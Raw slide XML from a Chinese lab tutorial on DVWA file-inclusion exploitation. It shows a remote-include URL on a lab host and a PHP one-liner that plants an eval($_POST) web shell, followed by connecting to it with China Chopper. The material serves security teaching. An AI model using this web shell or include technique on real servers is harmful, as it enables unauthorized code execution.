                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，注入后按回车键，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示文件打开失败，并且显示了文件所在的路径，证明这个参数是可以利用的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="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en-US" altLang="zh-CN"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2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en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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971550" y="2947670"/>
            <a:ext cx="10248900" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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80" cy="175196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本地文件包含漏洞的利用</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上，打开记事本，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“&lt;?php phpinfo(); ?&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，另存为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C:\phpinfo.php。</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en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809875" y="3128645"/>
            <a:ext cx="6572250" cy="2619375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11338560" cy="4845685"/>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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新建网站扫描</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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（3）点击Scan按钮，弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Choose Scanning Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对话框。</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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Scan Type中，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Full Scan（全扫描）</a:t>
            </a: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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Report中，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Affected Items（漏洞摘要）</a:t>
            </a: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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Schedule中，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Instant（立即）</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mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（4）点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Create Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮，开始扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>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2147482489"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="749935" y="2296160"/>
            <a:ext cx="4200525" cy="2953385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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80" cy="172212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本地文件包含漏洞的利用</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上，注入参数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C:\phpinfo.php，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结果表明文件包含不仅仅能读取文件，还能够执行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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1587600" y="3204845"/>
            <a:ext cx="9029700" cy="2162175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1375390" cy="222059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远程文件包含漏洞</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利用1</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上</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，打开记事本，输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;?php phpinfo(); ?&gt;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”，保存文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>phpinfo.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，并保存在网站根目录下。</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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上，注入参数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/phpinfo.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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1587600" y="3633470"/>
            <a:ext cx="9029700" cy="2162175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1160000" cy="172720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远程文件包含漏洞</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利用2</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2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①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上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写脚本文件muma.txt保存在网站根目录下，代码为：&lt;?php fputs(fopen("muma.php","w"),'&lt;?php  @eval($_POST[pass]);?&gt;') ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">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en-US" altLang="zh-CN"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en-US" altLang="zh-CN"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en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2782800" y="3267075"/>
            <a:ext cx="6638925" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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00" cy="171450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远程文件包含漏洞</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利用2</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② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上，注入参数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/muma.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>muma.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</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将写入到</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服务器A根目录的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dvwa/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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471170" y="3090545"/>
            <a:ext cx="6581775" cy="3590925"/>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7162800" y="3095625"/>
            <a:ext cx="4533900" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1160000" cy="171450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远程文件包含漏洞</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利用2</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③ </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使用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中国菜刀</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连接</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457200" lvl="1" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.201/dvwa/vulnerabilities/fi/muma.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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ow级别的文件包含漏洞利用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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1642745" y="3100070"/>
            <a:ext cx="8905875" cy="3552825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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53162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（1）查看源代码，分析漏洞利用方法</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，使用str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
